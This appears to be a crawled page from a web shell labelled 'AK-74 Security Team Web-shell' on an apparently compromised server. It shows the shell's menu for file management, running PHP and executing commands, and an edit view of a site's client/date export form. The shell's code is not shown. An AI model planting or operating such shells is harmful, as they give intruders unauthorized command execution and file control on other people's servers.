.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="http://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css" /> <!-- Load jQuery JS --> <script src="http://code.jquery.com/jquery-1.9.1.js"></script> <!-- Load jQuery UI Main JS --> <script src="http://code.jquery.com/ui/1.10.3/jquery-ui.js"></script> <script> /* jQuery ready function. Specify a function to execute when the DOM is fully loaded. */ $(document).ready( /* This is the function that will get executed after the DOM is fully loaded */ function() { $("#datepicker").datepicker( {dateFormat: 'yy-mm-dd'} ); } ); </script> <title></title> <style> body { background-image: url('logo.png'); background-repeat:no-repeat; padding-left: 500px; background-position: center; background-position-y: 300px; } </style> </head> <body> <form action="export.php" method="post"> <!-- <B>Client</B> <input type="text" name="user"><br> <B>Date</B> <input type="text" name="Date"><br> <input type="submit" value="export">--> <table> <tr> <td> <B>Client</B></td> <td><input type="text" name="user"></td> </tr> <tr> <td><B>Date</B></td> <td><input type="text" name="Date" id="datepicker" ></td> </tr> <tr> <td></td> <td> <input type="submit" value="export"></td> </tr> </table> </form> </body> </html>
Rename:
-